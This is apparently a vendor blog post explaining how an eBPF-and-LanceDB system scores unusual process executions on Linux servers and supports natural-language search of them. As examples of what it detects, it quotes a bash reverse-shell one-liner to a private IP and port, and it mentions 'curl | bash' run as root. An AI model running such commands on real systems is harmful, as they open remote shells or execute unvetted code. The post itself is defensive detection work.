Gretl

Posted on May 24

Detecting unusual processes on your servers without writing a single rule

#linux #machinelearning #monitoring #security

Most security tooling works by asking you to define what "bad" looks like upfront. Falco gives you YAML rules. OSSEC has signatures. Wazuh has a 5,000-line ruleset that ships with the product and still misses half of what matters in your specific environment.

The problem isn't that rules are bad — it's that they can only catch what someone already thought to write a rule for. A novel attack, an unusual deployment pattern, or a rogue process your team introduced six months ago and forgot about will all sail straight through.

We wanted something different: a system that learns what "normal" looks like on each server and workload automatically, and flags anything that deviates — without any configuration.

Here's how we built it using eBPF and LanceDB.

Step 1: Capture everything at the kernel level with eBPF
eBPF lets you attach programs to kernel events with minimal overhead. We attach to the sys_enter_execve tracepoint, which fires every time any process is executed on the machine — before the process even starts running.

For each execution we capture:

The process name (comm) and full command line (argv)
The parent process name
The UID of the calling process
Any active network connections (src/dst IP, port)
This is written in Rust using the Aya framework, which compiles the eBPF kernel program separately and loads it at runtime:

[tracepoint]

pub fn gretl_execve(ctx: TracePointContext) -> u32 {
let filename_ptr = unsafe { ctx.read_at::(16)? } as *const u8;
let pidtgid = bpf_get_current_pid_tgid();
let pid = (pidtgid >> 32) as u32;

let mut event = ExecveEvent {
    pid,
    comm:     [0u8; 16],
    filename: [0u8; 64],
    argv1:    [0u8; 64],
    // ...
};

if let Ok(comm) = bpf_get_current_comm() {
    event.comm = comm;
}

emit_execve(&event)

}
The events are written to a ring buffer and consumed by the userspace agent, which batches them and POSTs to the backend every 60 seconds. On kernel ≥ 5.8 with BTF enabled, zero instrumentation is required — no agents inside your containers, no sidecars, no changes to your application code.

For servers without eBPF support, the Node.js agent falls back to reading /proc//cmdline and /proc//status directly, tracking new PIDs each interval. You lose the real-time kernel hook but still get the process telemetry.

Step 2: Represent each process execution as a vector
The raw event — a process name, a cmdline string, a parent process, a port — isn't directly comparable. To measure similarity between executions, we need to turn each event into a fixed-length vector.

We use feature hashing: tokenise the event fields, hash each token into a position in a 128-dimensional vector, and accumulate signed contributions. The result is normalised to a unit vector.

function featureVector(event: ProcessEvent): number[] {
const vec = new Float32Array(128);

const tokens = [
event.process_name,
event.parent_process,
event.event_type,
String(event.local_port),
String(event.remote_port),
...tokenise(event.cmdline), // split cmdline into meaningful tokens
];

for (let i = 0; i < tokens.length; i++) {
const t = tokens[i].toLowerCase().trim();
if (!t) continue;
const idx = hashStr(t, i * 31) % 128;
const sign = (hashStr(t, i * 31 + 1) & 1) ? 1 : -1;
vec[idx] += sign;
}

// L2 normalise so cosine distance is well-defined
let norm = 0;
for (let i = 0; i < 128; i++) norm += vec[i] * vec[i];
norm = Math.sqrt(norm) || 1;
return Array.from(vec).map(v => v / norm);
}
Feature hashing is deterministic, requires no external model, adds no latency, and works well for this kind of structured-text input. A bash -i >& /dev/tcp/... command and a normal bash --login invocation will land in very different regions of the vector space.

Why not use a neural embedding model?
We looked at this seriously. Models like all-MiniLM-L6-v2 (22 MB, 384 dims) or OpenAI's text-embedding-3-small would give richer semantic similarity — they know that sh and bash are both shells, that /tmp and /dev/shm are both writable scratch paths.

The problem is the operational cost at ingestion time. The agent reports process events roughly every 60 seconds per server. For a fleet of 50 servers that's ~3,000 events per hour, each needing an embedding call before it can be scored and stored. The options were:

Local model on the backend — works, but adds a cold-start dependency, ~200 MB of model weights on disk, and 5–20 ms of CPU per event. On a small Fly.io instance shared with the API server, that's noticeable.
External API (e.g. OpenAI) — adds network latency to every ingest request, a per-token cost that scales with fleet size, and a hard external dependency that can take your security pipeline down.
Feature hashing — runs in <0.1 ms, zero dependencies, no network calls, fully deterministic. The same input always produces the same vector, which also makes testing straightforward.
For this specific input — structured fields like process names, parent pids, cmdline tokens — feature hashing performs surprisingly well. bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 and bash --login land in very different regions of the vector space because their token sets barely overlap. That's all we need for anomaly scoring.

The embedding layer is intentionally isolated behind a single featureVector() function. Swapping it for a neural model later is a one-function change — the scoring logic, the LanceDB tables, and the API surface don't care what's inside it.

Step 3: Store and query with LanceDB
LanceDB is an embedded vector database — it runs inside your process, stores data on disk, and supports fast approximate nearest-neighbour search with no separate infrastructure required.

We create one LanceDB table per (org_id, workload) pair. Each row stores the 128-dim vector and a timestamp. The table grows as new events arrive and old entries are pruned after 7 days.

export async function scoreAndLearn(
org_id: string,
workload: string,
event: ProcessEvent,
): Promise {
const conn = await db();
const table = await getOrCreateTable(conn, tableName(org_id, workload));
const vec = featureVector(event);

// Find k=10 nearest neighbours in this workload's history
const results = await table.vectorSearch(vec).limit(10).toArray();

let score = 1.0; // default: completely unseen
if (results.length > 0) {
const distances = results.map(r =>
cosineDistance(vec, Array.from(r.vector))
);
const minDist = Math.min(...distances);
score = Math.min(1, minDist * 2); // scale to 0–1
}

// Add this event to the baseline for future comparisons
table.add([{ vector: vec, ts: Date.now() }]);

return score;
}
The anomaly score is 0 for something we've seen many times before, and 1 for something completely new. It gets stored alongside the event in ClickHouse so you can query, filter, and alert on it.

Step 4: Natural language search
Once every event is a vector, querying by description becomes trivial. We embed the search query using the same feature-hashing pipeline and run a nearest-neighbour search across all workload tables.

// In the dashboard Security tab:
// "show me anything that looks like a reverse shell"

POST /telemetry/security/search
{ "query": "reverse shell bash outbound connection" }
This returns the events whose vectors are closest to the query vector — semantically similar behaviour, not keyword matches. A process running bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 will score highly even if it doesn't contain the literal words "reverse shell".

What it looks like in practice
After running on a production server for a few days, the baseline learns what "normal" looks like: your web server process, your cron jobs, your deployment scripts. Then:

A developer accidentally leaves a debug shell running → anomaly score 0.85, flagged as warn
Your CI/CD pipeline runs a new build script for the first time → score 0.72 on first run, drops to 0.1 after the second run
Someone runs curl | bash as root → score 0.94, flagged immediately
Your usual nginx worker restarts → score 0.02, ignored
No rules were written for any of these. The system learned the baseline automatically and the deviations surfaced on their own.

The architecture in one diagram
Server Backend Storage
────── ─────── ───────

eBPF (kernel) ──execve──▶ /otlp/v1/events
│
/proc fallback ──────────▶ │
▼
featureVector()
│
▼
LanceDB (per workload) ──▶ anomaly_score
│
▼
ClickHouse.security_events
│
▼
Dashboard + NL search
What's next
The current embedding is purely structural — it knows that bash and sh are different tokens, but doesn't know they're semantically similar shells. Upgrading to a small neural embedding model (something like all-MiniLM-L6-v2) would improve natural language search quality significantly, especially for queries phrased in plain English rather than technical terms.

We're also working on per-workload alert thresholds — so a security-sensitive production workload can be configured to alert at score 0.6, while a noisy dev environment uses a higher threshold of 0.85.

Try it on your servers
The agent installs in one command and starts building a baseline immediately. Works on any Linux server — EC2, GCP, bare metal. eBPF on kernel ≥ 5.8, /proc fallback everywhere else.

GR_TOKEN=your-token bash <(curl -fsSL https://gretl.dev/install-agent.sh)

DEV Community

Detecting unusual processes on your servers without writing a single rule

[tracepoint]

Top comments (0)